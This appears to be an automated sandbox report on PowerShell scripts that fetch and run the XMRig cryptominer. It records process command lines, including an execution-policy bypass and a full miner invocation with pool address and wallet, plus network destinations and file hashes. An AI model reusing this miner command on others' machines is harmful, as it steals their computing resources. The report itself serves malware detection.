memory/4728-115-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-116-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1472-0-0x00007FFAD4073000-0x00007FFAD4075000-memory.dmp

memory/1472-3-0x00000218F6CB0000-0x00000218F6CD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oluzusqg.s3m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1472-10-0x00007FFAD4070000-0x00007FFAD4B32000-memory.dmp

memory/1472-11-0x00007FFAD4070000-0x00007FFAD4B32000-memory.dmp

memory/1472-12-0x00007FFAD4070000-0x00007FFAD4B32000-memory.dmp

memory/1472-14-0x00000218F6D60000-0x00000218F6D72000-memory.dmp

memory/1472-15-0x00000218F6D50000-0x00000218F6D5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2328-46-0x0000025BE6180000-0x0000025BE61A0000-memory.dmp

memory/2328-47-0x0000025BE7B60000-0x0000025BE7B80000-memory.dmp

memory/2328-48-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/1472-49-0x00007FFAD4070000-0x00007FFAD4B32000-memory.dmp

memory/2328-51-0x0000025C7A750000-0x0000025C7A770000-memory.dmp

memory/2328-50-0x0000025BE7B80000-0x0000025BE7BA0000-memory.dmp

memory/1472-53-0x00007FFAD4073000-0x00007FFAD4075000-memory.dmp

memory/2328-52-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-54-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-57-0x0000025C7A750000-0x0000025C7A770000-memory.dmp

memory/2328-56-0x0000025BE7B80000-0x0000025BE7BA0000-memory.dmp

memory/2328-55-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-58-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-59-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-60-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-61-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-62-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-63-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-64-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-65-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-66-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-67-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-68-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-69-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-70-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-71-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-72-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-73-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-74-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-75-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-76-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-77-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-78-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-79-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-80-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-81-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-82-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-83-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-84-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-85-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-86-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-87-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-88-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-89-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-90-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-91-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-92-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-93-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-94-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-95-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-96-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-97-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-98-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-99-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-100-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-101-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-102-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-103-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-104-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-105-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-106-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-107-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-108-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-109-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-110-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-111-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-112-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-113-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-114-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-115-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

memory/2328-116-0x00007FF7F47F0000-0x00007FF7F5423000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:12

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1743s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 105.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 2.17.107.105:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

memory/3444-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

memory/3444-1-0x0000024D9E820000-0x0000024D9E842000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br4rxfbh.dwb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3444-11-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-12-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-14-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3444-15-0x0000024D9EB90000-0x0000024D9EBA2000-memory.dmp

memory/3444-16-0x0000024D86450000-0x0000024D8645A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1136-47-0x00000198AF400000-0x00000198AF420000-memory.dmp

memory/1136-48-0x00000198AF450000-0x00000198AF470000-memory.dmp

memory/1136-49-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/3444-50-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

memory/3444-51-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/1136-53-0x00000198AF470000-0x00000198AF490000-memory.dmp

memory/1136-52-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-54-0x00000198AF490000-0x00000198AF4B0000-memory.dmp

memory/3444-55-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/1136-56-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-58-0x00000198AF470000-0x00000198AF490000-memory.dmp

memory/1136-57-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-59-0x00000198AF490000-0x00000198AF4B0000-memory.dmp

memory/1136-60-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-61-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-62-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-63-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-64-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-65-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-66-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-67-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-68-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-69-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-70-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-71-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-72-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-73-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-74-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-75-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-76-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-77-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-78-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-79-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-80-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-81-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-82-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-83-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-84-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-85-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-86-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-87-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-88-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-89-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-90-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-91-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-92-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-93-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-94-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-95-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-96-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-97-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-98-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-99-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-100-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-101-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-102-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-103-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-104-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-105-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-106-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-107-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-108-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-109-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-110-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-111-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-112-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-113-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-114-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-115-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-116-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-117-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

memory/1136-118-0x00007FF675F90000-0x00007FF676BC3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3932-0-0x00007FFE5BA93000-0x00007FFE5BA95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qj5lgtmb.5ai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3932-9-0x000001953DA70000-0x000001953DA92000-memory.dmp

memory/3932-10-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-11-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-12-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-14-0x0000019556550000-0x0000019556562000-memory.dmp

memory/3932-15-0x000001953DC50000-0x000001953DC5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1848-46-0x000002C6BCDA0000-0x000002C6BCDC0000-memory.dmp

memory/1848-47-0x000002C6BE7A0000-0x000002C6BE7C0000-memory.dmp

memory/1848-48-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/3932-50-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/1848-49-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-51-0x000002C6BE7E0000-0x000002C6BE800000-memory.dmp

